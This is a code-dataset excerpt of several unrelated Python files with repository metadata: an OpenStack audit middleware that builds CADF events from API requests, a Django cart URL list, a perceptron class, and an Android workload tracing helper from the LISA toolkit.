class OpenStackResource(resource.Resource):
"""Extended CADF resource class with custom fields for OpenStack scope."""
def __init__(self, project_id=None, domain_id=None, **kwargs):
"""Initialize a new resource that has an OpenStack scope."""
super(OpenStackResource, self).__init__(**kwargs)
if project_id:
self.project_id = project_id
if domain_id:
self.domain_id = domain_id
def __getattr__(self, item):
"""Circumvent the magic attribute handling of pycadf here."""
if item in ['project_id', 'domain_id']:
return None
else:
return super(OpenStackResource, self).__getattribute__(item)
def str_map(param):
"""Ensure that a dictionary contains only string values."""
if not param:
return {}
for k, v in six.iteritems(param):
if v is not None and (not isinstance(k, six.string_types) or
not isinstance(v, six.string_types)):
raise Exception("Invalid config entry %s:%s (not strings)",
k, v)
return param
def payloads_config(param):
"""Create a valid payloads config from the config file contents."""
if not param:
return {'enabled': True}
payloads_config = param.copy()
payloads_config['enabled'] = bool(param.get('enabled', True))
return payloads_config
def _make_tags(ev):
"""Build statsd metric tags from CADF event."""
return [
'project_id:{0}'.format(ev.target.project_id or
ev.initiator.project_id or
ev.initiator.domain_id),
'target_type_uri:{0}'.format(ev.target.typeURI),
'action:{0}'.format(ev.action),
'outcome:{0}'.format(ev.outcome)]
class OpenStackAuditMiddleware(object):
"""The actual middleware implementation, a filter for the paste pipe."""
def __init__(self, cfg_file, payloads_enabled, metrics_enabled,
log=logging.getLogger(__name__)):
"""Configure to recognize and map known API paths."""
self._log = log
try:
with open(cfg_file, 'r') as f:
conf = yaml.safe_load(f)
self._payloads_enabled = payloads_enabled
self._service_type = conf['service_type']
self._service_name = conf.get('service_name', self._service_type)
self._service_id = self._build_service_id(self._service_name)
self._prefix_re = re.compile(conf['prefix'])
# default_target_endpoint_type = conf.get('target_endpoint_type')
# self._service_endpoints = conf.get('service_endpoints', {})
self._resource_specs = self._build_audit_map(conf['resources'])
except KeyError as err:
raise ConfigError('Missing config property in %s: %s', cfg_file,
str(err))
except (OSError, yaml.YAMLError) as err:
raise ConfigError('Error opening config file %s: %s',
cfg_file, str(err))
self._statsd = self._create_statsd_client() \
if metrics_enabled else None
def _create_statsd_client(self):
"""Create the statsd client (if datadog package is present)."""
try:
import datadog
return datadog.dogstatsd.DogStatsd(
host=os.getenv('STATSD_HOST', 'localhost'),
port=int(os.getenv('STATSD_PORT', '8125')),
namespace='openstack_audit',
constant_tags=['service:{0}'.format(self._service_type)]
)
except ImportError:
self._log.warning("Python datadog package not installed. No "
"openstack_audit_* metrics will be produced.")
def _build_audit_map(self, res_dict, parent_type_uri=None):
"""Build the resourc hierarchy in a dictionary.
The dictionary maps the resource name used in the REST API's URL
path to the ResourceSpec descriptor. That descriptor contains all
the information needed to produce the CADF events from HTTP requests.
"""
result = {}
for name, s in six.iteritems(res_dict):
res_spec, rest_name = self._build_res_spec(name, parent_type_uri,
s)
# ensure that cust
result[rest_name] = res_spec
return result
def _build_res_spec(self, name, parent_type_uri, spec=None):
"""Build the resource descriptor from and entry in the mapping file.
Parameters:
name: CADF name of the resource type
parent_type_uri: type URI of the parent CADF resource type
(acting as prefix)
spec: mapping entry from the config to be parsed
"""
if not spec:
spec = {}
if parent_type_uri:
pfx = parent_type_uri
else:
pfx = self._service_type
# REST path segment normally equals resource name
rest_name = spec.get('api_name', name)
singleton = spec.get('singleton', False)
type_name = spec.get('type_name')
# derive the type name used for resource representations in JSON from
# the REST name
if not type_name:
type_name = rest_name.replace('-', '_')
if type_name.startswith('os_'):
type_name = type_name[3:]
type_uri = spec.get('type_uri', pfx + "/" + name)
el_type_name = None
el_type_uri = None
childs_parent_type_uri = None
if not singleton:
# derive the name of the individual resource instances (elements)
# by omitting the last character of the resource name
el_type_name = spec.get('el_type_name', type_name[:-1])
el_type_uri = type_uri[:-1]
childs_parent_type_uri = el_type_uri
else:
childs_parent_type_uri = type_uri
res_spec = ResourceSpec(type_name, el_type_name,
type_uri, el_type_uri, singleton,
spec.get('custom_id', 'id'),
spec.get('custom_name', 'name'),
str_map(spec.get('custom_actions')),
str_map(spec.get('custom_attributes')),
self._build_audit_map(
spec.get('children', {}),
childs_parent_type_uri),
payloads_config(spec.get('payloads')))
return res_spec, rest_name
def create_events(self, request, response=None):
"""Build a CADF event from request and response."""
# drop the endpoint's path prefix
path, target_project = self._handle_url_prefix(request)
if not path:
self._log.info("ignoring request with path: %s",
request.path)
return None
# normalize url: remove trailing slash and .json suffix
path = path[:-1] if path.endswith('/') else path
path = path[:-5] if path.endswith('.json') else path
return self._build_events(target_project, self._resource_specs,
None, None, request, response, path, 0)
def _build_events(self, target_project, res_spec, res_id, res_parent_id,
request, response, path, cursor=0):
"""Parse a request recursively and builds CADF events from it.
This methods parses the URL path from left to right and builds the
resource hierarchy from it. The res_spec resource tree is used to
interpret the path segments properly, e.g. known when a path
segment represents a resource name, an ID or an attribute name.
Parameters:
target_project: target project ID if specified in the path
res_spec: resource tree constructed from the mapping file
res_id: ID of the target resource
parent_res_id: ID of the parent resource of the target resource
request: incoming request to parse
response: resulting response to parse (e.g. to obtain results,
just created resource IDs)
path: URL path being parsed
cursor: current position in the path as it is parsed
"""
# Check if the end of path is reached and event can be created finally
if cursor == -1:
# end of path reached, create the event
return self._create_events(target_project, res_id,
res_parent_id,
res_spec, request, response)
# Find next path segment (skip leading / with +1)
next_pos = path.find('/', cursor + 1)
# token = scanned token (NOT keystone token)
token = None
if next_pos != -1:
# that means there are more path segments
token = path[cursor + 1:next_pos]
elif (cursor + 1) < len(path):
# last path segment found, not more '/' right of it
token = path[cursor + 1:]
# handle the current token
if isinstance(res_spec, dict):
# the resource tree node contains a dict => the token contains the
# top-level resource name
sub_res_spec = res_spec.get(token)
if sub_res_spec is None:
# create resource spec on demand using defaults
sub_res_spec = self.register_resource(None, token)
res_spec[token] = sub_res_spec
return self._build_events(target_project, sub_res_spec, None, None,
request,
response,
path, next_pos)
elif isinstance(res_spec, ResourceSpec):
# if the ID is set or it is a singleton, then the next token will
# be an action or child
if res_id or res_spec.singleton or token in res_spec.children:
child_res = res_spec.children.get(token)
if child_res:
# the ID is still the one of the parent (or its parent if
# the direct parent is a singleton)
return self._build_events(target_project, child_res, None,
res_id or res_parent_id, request,
response, path, next_pos)
elif _UUID_RE.match(token):
# next up should be an ID (unless it is a known action)
return self._build_events(target_project, res_spec, token,
res_parent_id, request, response,
path, next_pos)
if next_pos == -1:
# last path segment --> token must be an action or a key
return self._create_events(target_project, res_id,
res_parent_id, res_spec, request,
response, token)
else:
# unknown resource name
# create resource spec on demand ...
res_spec.children[token] = self.register_resource(
res_spec.el_type_uri,
token)
# ... then repeat same call with res_spec now existing
return self._build_events(target_project, res_spec, res_id,
res_parent_id, request, response,
path, cursor)
self._log.warning(
"Unexpected continuation of resource path after segment %s: %s",
token, request.path)
return None
def register_resource(self, parent_type_uri, token):
"""Register an unknown resource to avoid missed events.
The resulting events are a bit raw but contain enough
information to understand what happened. This allows for
incremental improvement.
"""
self._log.warning("unknown resource: %s (created on demand)",
token)
res_name = token.replace('_', '-')
if res_name.startswith('os-'):
res_name = res_name[3:]
res_name = 'X' + res_name
res_dict = {'api_name': token}
sub_res_spec, _ = self._build_res_spec(res_name,
parent_type_uri,
res_dict)
return sub_res_spec
def _create_events(self, target_project, res_id,
res_parent_id,
res_spec, request, response, suffix=None):
events = []
# check for update operations (POST, PUT, PATCH)
if request.method[0] == 'P' and response \
and response.content_length > 0 \
and response.content_type == "application/json":
res_payload = response.json
# check for bulk-operation
if not res_spec.singleton and res_payload and \
isinstance(res_payload.get(res_spec.type_name), list):
# payloads contain an attribute named like the resource
# which contains a list of items
res_pl = res_payload[res_spec.type_name]
req_pl = None
if self._payloads_enabled and res_spec.payloads['enabled']:
req_pl = iter(request.json.get(res_spec.type_name))
# create one event per item
for subpayload in res_pl:
ev = self._create_event_from_payload(target_project,
res_spec,
res_id,
res_parent_id,
request, response,
subpayload, suffix)
pl = next(req_pl) if req_pl else None
if ev:
if pl:
# attach payload if requested
self._attach_payload(ev, pl, res_spec)
events.append(ev)
else:
# remove possible wrapper elements
if res_payload:
res_payload = res_payload.get(res_spec.el_type_name,
res_payload)
event = self._create_event_from_payload(target_project,
res_spec,
res_id,
res_parent_id,
request, response,
res_payload, suffix)
if not event:
return []
# attach payload if requested
if self._payloads_enabled and res_spec.payloads['enabled'] \
and request.content_length > 0 \
and request.content_type == "application/json":
req_pl = request.json
# remove possible wrapper elements
if isinstance(req_pl, dict):
req_pl = req_pl.get(res_spec.el_type_name, req_pl)
self._attach_payload(event, req_pl, res_spec)
events.append(event)
else:
event = self._create_cadf_event(target_project, res_spec, res_id,
res_parent_id,
request, response, suffix)
if not event:
return []
if event and request.method[0] == 'P' \
and self._payloads_enabled \
and res_spec.payloads['enabled']:
self._attach_payload(event, request.json, res_spec)
events = [event]
for ev in events:
if self._statsd:
self._statsd.increment('events',
tags=_make_tags(ev))
return events
def _create_event_from_payload(self, target_project, res_spec, res_id,
res_parent_id, request, response,
subpayload, suffix=None):
self._log.debug("create event from payload: %s",
self._clean_payload(subpayload, res_spec))
ev = self._create_cadf_event(target_project, res_spec, res_id,
res_parent_id, request,
response, suffix)
if not ev:
return None
ev.target = self._create_target_resource(target_project, res_spec,
res_id, res_parent_id,
subpayload)
# extract custom attributes from the payload
for attr, typeURI in six.iteritems(res_spec.custom_attributes):
value = subpayload.get(attr)
if value:
if not isinstance(value, six.string_types):
value = json.dumps(value, separators=(',', ':'))
attach_val = Attachment(typeURI=typeURI, content=value,
name=attr)
ev.add_attachment(attach_val)
return ev
def _create_cadf_event(self, project, res_spec, res_id, res_parent_id,
request, response, suffix):
action, key = self._get_action_and_key(res_spec, res_id, request,
suffix)
if not action:
return None
project_id = request.environ.get('HTTP_X_PROJECT_ID')
domain_id = request.environ.get('HTTP_X_DOMAIN_ID')
initiator = OpenStackResource(
project_id=project_id, domain_id=domain_id,
typeURI=taxonomy.ACCOUNT_USER,
id=request.environ.get('HTTP_X_USER_ID', taxonomy.UNKNOWN),
name=request.environ.get('HTTP_X_USER_NAME', taxonomy.UNKNOWN),
domain=request.environ.get('HTTP_X_USER_DOMAIN_NAME',
taxonomy.UNKNOWN),
host=host.Host(address=request.client_addr,
agent=request.user_agent))
action_result = None
event_reason = None
if response:
if 200 <= response.status_int < 400:
action_result = taxonomy.OUTCOME_SUCCESS
else:
action_result = taxonomy.OUTCOME_FAILURE
event_reason = reason.Reason(
reasonType='HTTP', reasonCode=str(response.status_int))
else:
action_result = taxonomy.UNKNOWN
target = None
if res_id or res_parent_id:
target = self._create_target_resource(project, res_spec, res_id,
res_parent_id, key=key)
else:
target = self._create_target_resource(project, res_spec,
None, self._service_id,
key=key)
target.name = self._service_name
observer = self._create_observer_resource()
event = eventfactory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=action_result,
action=action,
initiator=initiator,
observer=observer,
reason=event_reason,
target=target)
event.requestPath = request.path_qs
# add reporter step again?
# event.add_reporterstep(
# reporterstep.Reporterstep(
# role=cadftype.REPORTER_ROLE_MODIFIER,
# reporter=resource.Resource(id='observer'),
# reporterTime=timestamp.get_utc_now()))
return event
@staticmethod
def _clean_payload(payload, res_spec):
"""Clean request payload of sensitive info."""
incl = res_spec.payloads.get('include')
excl = res_spec.payloads.get('exclude')
res_payload = {}
if excl and isinstance(payload, dict):
# make a copy so we do not change the original request
res_payload = payload.copy()
# remove possible wrapper elements
for k in excl:
if k in res_payload:
del res_payload[k]
elif incl and isinstance(payload, dict):
for k in incl:
v = payload.get(k)
if v:
res_payload[k] = v
else:
res_payload = payload
return res_payload
@staticmethod
def _attach_payload(event, payload, res_spec):
"""Attach request payload to event."""
res_payload = OpenStackAuditMiddleware._clean_payload(
payload, res_spec)
attach_val = Attachment(typeURI="mime:application/json",
content=json.dumps(res_payload,
separators=(',', ':')),
name='payload')
event.add_attachment(attach_val)
def _create_target_resource(self, target_project, res_spec, res_id,
res_parent_id=None, payload=None, key=None):
"""Build the event's target element from the payload."""
project_id = target_project
rid = res_id
name = None
# fetch IDs from payload if possible
if payload:
if isinstance(payload, dict):
name = payload.get(res_spec.name_field)
# some custom ID fields are no UUIDs/strings but just integers
if not rid:
custom_id = payload.get(res_spec.id_field)
rid = str(custom_id) if custom_id else None
project_id = (target_project or payload.get('project_id') or
payload.get('tenant_id'))
else:
project_id = target_project
self._log.warning(
"mapping error, malformed resource payload %s (no dict) "
"in bulk operation on resource: %s",
payload,
res_spec)
type_uri = res_spec.el_type_uri if rid else res_spec.type_uri
rid = _make_uuid(rid or res_parent_id or taxonomy.UNKNOWN)
target = OpenStackResource(project_id=project_id, id=rid,
typeURI=type_uri, name=name)
# provide name of custom keys in attachment of target
if key:
target.add_attachment(Attachment(typeURI="xs:string",
content=key, name='key'))
return target
def _create_observer_resource(self):
"""Build the observer element representing this middleware."""
observer = resource.Resource(typeURI='service/' + self._service_type,
id=self._service_id,
name=self._service_name)
return observer
def _get_action_and_key(self, res_spec, res_id, request, suffix):
"""Determine the CADF action and key from the request.
Depending on already known information, this function will
either use the HTTP method or the payload to determine
which CADF action to report.
Parameters:
res_spec: target resource descriptor
request: the request
suffix: the last path component (already known)
"""
if suffix is None:
return self._get_action_from_method(request.method, res_spec,
res_id), None
if suffix == 'action':
action = self._get_action_from_payload(request, res_spec, res_id)
return action, None
return self._get_action_and_key_from_path_suffix(
suffix, request.method, res_spec, res_id)
@staticmethod
def _get_action_from_method(method, res_spec, res_id):
"""Determine the CADF action from the HTTP method."""
if method == 'POST':
if res_id or res_spec.singleton:
return taxonomy.ACTION_UPDATE
return taxonomy.ACTION_CREATE
elif method == 'GET' or method == 'HEAD':
if res_id or res_spec.singleton:
return taxonomy.ACTION_READ
return taxonomy.ACTION_LIST
elif method == "PATCH":
return taxonomy.ACTION_UPDATE
return _method_action_map[method]
def _get_action_and_key_from_path_suffix(self, path_suffix, method,
res_spec, res_id):
"""Determine the CADF action from the URL path."""
rest_action = path_suffix
# check for individual mapping of action
action = res_spec.custom_actions.get(rest_action)
if action is not None:
return action, None
# check for generic mapping
rule = method + ':*'
if rule in res_spec.custom_actions:
action = res_spec.custom_actions.get(rule)
if action is not None:
return action.replace('*', rest_action), None
else:
# action suppressed by intention
return None, None
# no action mapped to suffix => custom key
action = self._get_action_from_method(method, res_spec, res_id)
action += _key_action_suffix_map[action]
return action, path_suffix
def _get_action_from_payload(self, request, res_spec, res_id):
"""Determine the CADF action from the payload."""
try:
payload = request.json
if payload:
rest_action = next(iter(payload))
# check for individual mapping of action
action = res_spec.custom_actions.get(rest_action)
if action is not None:
return action
# apply generic default mapping rule here
return self._get_action_from_method(
request.method, res_spec, res_id) + '/' + rest_action
else:
self._log.warning("/action URL without payload: %s",
request.path)
return None
except ValueError:
self._log.warning("unexpected empty action payload for path: %s",
request.path)
return None
@staticmethod
def _build_service_id(name):
"""Invent stable UUID for the service itself."""
md5_hash = hashlib.md5(name.encode('utf-8')) # nosec
ns = uuid.UUID(md5_hash.hexdigest())
return str(uuid.uuid5(ns, socket.getfqdn()))
def _handle_url_prefix(self, request):
"""Process the prefix from the URL path and remove it.
:param request: incoming request
:return: URL request path without the leading prefix or None if prefix
was missing and optional target tenant or None
"""
g = self._prefix_re.match(request.path)
if g:
path = request.path[g.end():]
project = None
try:
# project needs to be specified in a named group in order to
# be detected
project = g.group('project_id')
except IndexError:
project = None
return path, project
return None, None
| 41.260516 | 79 | 0.549739 |
b5748b3308bcb97b8bb48ab624b8e808093bff77 | 358 | py | Python | meiduo_mall/apps/carts/urls.py | zzZaida/meiduo_project | aaafdab7bcb61ac4c721e2f76605072b55e931f9 | [
"MIT"
] | null | null | null | meiduo_mall/apps/carts/urls.py | zzZaida/meiduo_project | aaafdab7bcb61ac4c721e2f76605072b55e931f9 | [
"MIT"
] | null | null | null | meiduo_mall/apps/carts/urls.py | zzZaida/meiduo_project | aaafdab7bcb61ac4c721e2f76605072b55e931f9 | [
"MIT"
] | null | null | null | from django.conf.urls import url
from django.contrib import admin
from . import views
urlpatterns = [
# 购物车
url(r'^carts/$', views.CartsView.as_view()),
# 全选 /carts/selection/
url(r'^carts/selection/$', views.CartsSelectAllView.as_view()),
# 展示商品页面简单购物车 carts/simple/
url(r'^carts/simple/$', views.CartsSimpleView.as_view()),
]
| 19.888889 | 67 | 0.675978 |
5d47d39f49c9e295ffb19ab5da39523762254a0a | 2,489 | py | Python | src/neural_network/Perceptron.py | rudyn2/cc5114 | 16ee51ef168ff395ece6cd4e4bb04a01ee8277cd | [
"MIT"
] | 2 | 2019-08-18T18:35:20.000Z | 2021-12-19T00:52:52.000Z | src/neural_network/Perceptron.py | rudyn2/cc5114 | 16ee51ef168ff395ece6cd4e4bb04a01ee8277cd | [
"MIT"
] | null | null | null | src/neural_network/Perceptron.py | rudyn2/cc5114 | 16ee51ef168ff395ece6cd4e4bb04a01ee8277cd | [
"MIT"
] | null | null | null | from src.neural_network.Neuron import Neuron
import numpy as np
__autor__ = "Rudy García Alvarado"
class Perceptron(Neuron):
"""
This class provides the algorithms and tools to implement a Perceptron.
"""
def __init__(self, n_input, activation_func, learning_rate):
super(Perceptron, self).__init__(n_input, activation_func)
self.learning_rate = learning_rate
self.x = None
self.y = None
self.w = None
self.b = None
self.last_error = None
def fit(self, x_train, y_train):
"""
It receives the data to train and store it in the neuron. The x_train data must be 2d dimensional and the
second dimension must be equals to n_input.
of the neuron.
:param x_train: Numpy array 2D
:param y_train: Numpy array 1D
"""
assert x_train.shape[1] == self.n_input, "This neuron can't fit the dimension of the input."
self.x = x_train
self.y = y_train
def train(self):
"""
This method trains a perceptron using a simple algorithm explained in the McCulloch-Pitts model of a
perceptron. The weights are stored in the W attribute.
:param: If True the learning curve will be plotted.
"""
# Init a weights vector
self.w = np.zeros(shape=(self.x.shape[1], 1))
# Init the bias
b = (np.random.random()*-1 + np.random.random())*2
error = []
# Training using perceptron algorithm
for i in range(self.x.shape[0]):
ex = self.x[i, :]
desired_output = self.y[i]
# Predicts the output
predicted_output = np.matmul(ex, self.w) + b
# Calculate the difference between real and predicted output
diff = float(desired_output-predicted_output)
error.append(diff)
self.w += self.learning_rate*diff*(ex.reshape(self.w.shape[0], 1))
b += self.learning_rate*diff
self.b = b
self.last_error = error
def predict(self):
"""
Executes a forward propagation in the network and outputs the result. This was designed to
perform logical operations between just n operators.
:return: A Numpy Array with the predicted values.
"""
result = np.matmul(self.x, self.w) + self.b
return np.array(result)
| 32.324675 | 113 | 0.588992 |
9415a85c9d306803d22c14571d0f8873e2206017 | 12,737 | py | Python | libs/utils/android/workload.py | DennissimOS/platform_external_lisa | c8745316dd428d6bc5b939bbc83995c33e441b8a | [
"Apache-2.0"
] | null | null | null | libs/utils/android/workload.py | DennissimOS/platform_external_lisa | c8745316dd428d6bc5b939bbc83995c33e441b8a | [
"Apache-2.0"
] | null | null | null | libs/utils/android/workload.py | DennissimOS/platform_external_lisa | c8745316dd428d6bc5b939bbc83995c33e441b8a | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2015, ARM Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import re
import webbrowser
import time
from collections import namedtuple
from gfxinfo import GfxInfo
from surfaceflinger import SurfaceFlinger
from devlib.utils.android_build import Build
from . import System
class Workload(object):
"""
Base class for Android related workloads
"""
_packages = None
_availables = {}
WorkloadPackage = namedtuple("WorkloadPackage", "package_name apk_path src_path")
def __init__(self, test_env):
"""
Initialized workloads available on the specified test environment
test_env: target test environment
"""
self._te = test_env
self._target = test_env.target
self._log = logging.getLogger('Workload')
# Set of data reported in output of each run
self.trace_file = None
self.nrg_report = None
# Hooks to run at different points of workload execution
self.hooks = {}
def _adb(self, cmd):
return 'adb -s {} {}'.format(self._target.adb_name, cmd)
@classmethod
def _packages_installed(cls, sc, allow_install):
# If workload does not have packages just return
if not hasattr(sc, 'packages'):
return True
# Require package to be installed unless it can be installed when allowed
if allow_install:
required_packages = [package.package_name for package in sc.packages if package.apk_path==None]
else:
required_packages = [package.package_name for package in sc.packages]
return all(p in cls._packages for p in required_packages)
@classmethod
def _build_packages(cls, sc, te):
bld = Build(te)
for p in sc.packages:
if p.src_path != None:
bld.build_module(p.src_path)
return True
@classmethod
def _install_packages(cls, sc, te):
for p in sc.packages:
System.install_apk(te.target,
'{}/{}'.format(te.ANDROID_PRODUCT_OUT, p.apk_path))
return True;
@classmethod
def _subclasses(cls):
"""
Recursively get all subclasses
"""
nodes = cls.__subclasses__()
return nodes + [child for node in nodes for child in node._subclasses()]
@classmethod
def _check_availables(cls, test_env):
"""
List the supported android workloads which are available on the target
"""
_log = logging.getLogger('Workload')
# Getting the list of installed packages
cls._packages = test_env.target.list_packages()
_log.debug('Packages:\n%s', cls._packages)
_log.debug('Building list of available workloads...')
for sc in Workload._subclasses():
_log.debug('Checking workload [%s]...', sc.__name__)
# Check if all required packages are installed or can be installed
if cls._packages_installed(sc, True):
cls._availables[sc.__name__.lower()] = sc
_log.info('Supported workloads available on target:')
_log.info(' %s', ', '.join(cls._availables.keys()))
@classmethod
def getInstance(cls, test_env, name, reinstall=False):
"""
Get a reference to the specified Android workload
:param test_env: target test environment
:type test_env: TestEnv
:param name: workload name
:type name: str
:param reinstall: flag to reinstall workload applications
:type reinstall: boolean
"""
# Initialize list of available workloads
if cls._packages is None:
cls._check_availables(test_env)
if name.lower() not in cls._availables:
msg = 'Workload [{}] not available on target'.format(name)
raise ValueError(msg)
sc = cls._availables[name.lower()]
if (reinstall or not cls._packages_installed(sc, False)):
if (not cls._build_packages(sc, test_env) or
not cls._install_packages(sc, test_env)):
msg = 'Unable to install packages required for [{}] workload'.format(name)
raise RuntimeError(msg)
ret_cls = sc(test_env)
# Add generic support for cgroup tracing (detect if cgroup module exists)
if ('modules' in test_env.conf) and ('cgroups' in test_env.conf['modules']):
# Enable dumping support (which happens after systrace starts)
ret_cls._log.info('Enabling CGroup support for dumping schedtune/cpuset events')
ret_cls.add_hook('post_collect_start', ret_cls.post_collect_start_cgroup)
# Also update the extra ftrace points needed
if not 'systrace' in test_env.conf:
test_env.conf['systrace'] = { 'extra_events': ['cgroup_attach_task', 'sched_process_fork'] }
else:
if not 'extra_events' in test_env.conf['systrace']:
test_env.conf['systrace']['extra_events'] = ['cgroup_attach_task', 'sched_process_fork']
else:
test_env.conf['systrace']['extra_events'].extend(['cgroup_attach_task', 'sched_process_fork'])
return ret_cls
def trace_cgroup(self, controller, cgroup):
cgroup = self._te.target.cgroups.controllers[controller].cgroup('/' + cgroup)
cgroup.trace_cgroup_tasks()
def post_collect_start_cgroup(self):
# Since systrace starts asynchronously, wait for trace to start
while True:
if self._te.target.execute('cat /d/tracing/tracing_on')[0] == "0":
time.sleep(0.1)
continue
break
self.trace_cgroup('schedtune', '') # root
self.trace_cgroup('schedtune', 'top-app')
self.trace_cgroup('schedtune', 'foreground')
self.trace_cgroup('schedtune', 'background')
self.trace_cgroup('schedtune', 'rt')
self.trace_cgroup('cpuset', '') # root
self.trace_cgroup('cpuset', 'top-app')
self.trace_cgroup('cpuset', 'foreground')
self.trace_cgroup('cpuset', 'background')
self.trace_cgroup('cpuset', 'system-background')
def add_hook(self, hook, hook_fn):
allowed = ['post_collect_start']
if hook not in allowed:
return
self.hooks[hook] = hook_fn
def run(self, out_dir, collect='',
**kwargs):
raise RuntimeError('Not implemented')
def tracingStart(self, screen_always_on=True):
# Keep the screen on during any data collection
if screen_always_on:
System.screen_always_on(self._target, enable=True)
# Reset the dumpsys data for the package
if 'gfxinfo' in self.collect:
System.gfxinfo_reset(self._target, self.package)
if 'surfaceflinger' in self.collect:
System.surfaceflinger_reset(self._target, self.package)
if 'logcat' in self.collect:
System.logcat_reset(self._target)
# Make sure ftrace and systrace are not both specified to be collected
if 'ftrace' in self.collect and 'systrace' in self.collect:
msg = 'ftrace and systrace cannot be used at the same time'
raise ValueError(msg)
# Start FTrace
if 'ftrace' in self.collect:
self.trace_file = os.path.join(self.out_dir, 'trace.dat')
self._log.info('FTrace START')
self._te.ftrace.start()
# Start Systrace (mutually exclusive with ftrace)
elif 'systrace' in self.collect:
self.trace_file = os.path.join(self.out_dir, 'trace.html')
# Get the systrace time
match = re.search(r'systrace_([0-9]+)', self.collect)
self._trace_time = match.group(1) if match else None
self._log.info('Systrace START')
self._target.execute('echo 0 > /d/tracing/tracing_on')
self._systrace_output = System.systrace_start(
self._te, self.trace_file, self._trace_time, conf=self._te.conf)
if 'energy' in self.collect:
# Wait for systrace to start before cutting off USB
while True:
if self._target.execute('cat /d/tracing/tracing_on')[0] == "0":
time.sleep(0.1)
continue
break
# Initializing frequency times
if 'time_in_state' in self.collect:
self._time_in_state_start = self._te.target.cpufreq.get_time_in_state(
self._te.topology.get_level('cluster'))
# Initialize energy meter results
if 'energy' in self.collect and self._te.emeter:
self._te.emeter.reset()
self._log.info('Energy meter STARTED')
# Run post collect hooks passed added by the user of wload object
if 'post_collect_start' in self.hooks:
hookfn = self.hooks['post_collect_start']
self._log.info("Running post collect startup hook {}".format(hookfn.__name__))
hookfn()
def tracingStop(self, screen_always_on=True):
# Collect energy meter results
if 'energy' in self.collect and self._te.emeter:
self.nrg_report = self._te.emeter.report(self.out_dir)
self._log.info('Energy meter STOPPED')
# Calculate the delta in frequency times
if 'time_in_state' in self.collect:
self._te.target.cpufreq.dump_time_in_state_delta(
self._time_in_state_start,
self._te.topology.get_level('cluster'),
os.path.join(self.out_dir, 'time_in_state.json'))
# Stop FTrace
if 'ftrace' in self.collect:
self._te.ftrace.stop()
self._log.info('FTrace STOP')
self._te.ftrace.get_trace(self.trace_file)
# Stop Systrace (mutually exclusive with ftrace)
elif 'systrace' in self.collect:
if not self._systrace_output:
self._log.warning('Systrace is not running!')
else:
self._log.info('Waiting systrace report [%s]...',
self.trace_file)
if self._trace_time is None:
# Systrace expects <enter>
self._systrace_output.sendline('')
self._systrace_output.wait()
# Parse the data gathered from dumpsys gfxinfo
if 'gfxinfo' in self.collect:
dump_file = os.path.join(self.out_dir, 'dumpsys_gfxinfo.txt')
System.gfxinfo_get(self._target, self.package, dump_file)
self.gfxinfo = GfxInfo(dump_file)
# Parse the data gathered from dumpsys SurfaceFlinger
if 'surfaceflinger' in self.collect:
dump_file = os.path.join(self.out_dir, 'dumpsys_surfaceflinger.txt')
System.surfaceflinger_get(self._target, self.package, dump_file)
self.surfaceflinger = SurfaceFlinger(dump_file)
if 'logcat' in self.collect:
dump_file = os.path.join(self.out_dir, 'logcat.txt')
System.logcat_get(self._target, dump_file)
# Dump a platform description
self._te.platform_dump(self.out_dir)
# Restore automatic screen off
if screen_always_on:
System.screen_always_on(self._target, enable=False)
def traceShow(self):
"""
Open the collected trace using the most appropriate native viewer.
The native viewer depends on the specified trace format:
- ftrace: open using kernelshark
- systrace: open using a browser
In both cases the native viewer is assumed to be available in the host
machine.
"""
if 'ftrace' in self.collect:
os.popen("kernelshark {}".format(self.trace_file))
return
if 'systrace' in self.collect:
webbrowser.open(self.trace_file)
return
self._log.warning('No trace collected since last run')
# vim :set tabstop=4 shiftwidth=4 expandtab
| 39.433437 | 118 | 0.620947 |
265b9cba52e81f4f871ca6176fcfa13e57dde3b2 | 1,616 | py | Python | elude/servers/redis.py | leonth/elude | 52b8f53cc4bbfa5cb99424eb5386c49abf98acbd | [
"MIT"
] | null | null | null | elude/servers/redis.py | leonth/elude | 52b8f53cc4bbfa5cb99424eb5386c49abf98acbd | [
"MIT"
] | null | null | null | elude/servers/redis.py | leonth/elude | 52b8f53cc4bbfa5cb99424eb5386c49abf98acbd | [
"MIT"
] | null | null | null | import asyncio
import asyncio_redis
from elude import config
from elude.servers import BaseServer
REDIS_REQUEST_WIP_KEY = '_elude:request_wip'
class RedisServer(BaseServer):
def __init__(self, proxy_gatherer, serialize_func, deserialize_func):
super().__init__(proxy_gatherer)
self.serialize = serialize_func
self.deserialize = deserialize_func
self._request_cache = {}
self._conn = None
@asyncio.coroutine
def connect(self):
if self._conn is None:
self._conn = yield from asyncio_redis.Pool.create(host=config.SERVER_REDIS_HOST, port=config.SERVER_REDIS_PORT, password=config.SERVER_REDIS_PASSWORD, db=config.SERVER_REDIS_DB, poolsize=3)
return self._conn
@asyncio.coroutine
def serve(self):
conn = yield from self.connect()
while True:
request_obj_raw = yield from conn.brpoplpush(config.SERVER_REDIS_REQUEST_KEY, REDIS_REQUEST_WIP_KEY)
try:
request_obj = self.deserialize(request_obj_raw)
self.put_request(request_obj)
except ValueError:
self.process_response({'id': None, 'error': {'code': -32700, 'message': 'Parse error'}})
conn.close()
def process_response(self, result):
@asyncio.coroutine
def really_process():
conn = yield from self.connect()
yield from conn.lpush(config.SERVER_REDIS_RESPONSE_KEY_PREFIX + str(result['id']), [self.serialize(result)])
#yield from self.conn.lrem(REDIS_REQUEST_WIP_KEY, , -1)
asyncio.async(really_process()) | 38.47619 | 201 | 0.675124 |
dba122ede03ab049287c750a0d2199034b5cbaee | 2,483 | py | Python | example_pb2.py | Muroger/SVHNClassifier_pytorch | 608e2fc4d7eee0966949533195ad91abca6cf323 | [
"MIT"
] | 177 | 2017-04-02T18:13:13.000Z | 2022-02-22T05:51:06.000Z | example_pb2.py | Muroger/SVHNClassifier_pytorch | 608e2fc4d7eee0966949533195ad91abca6cf323 | [
"MIT"
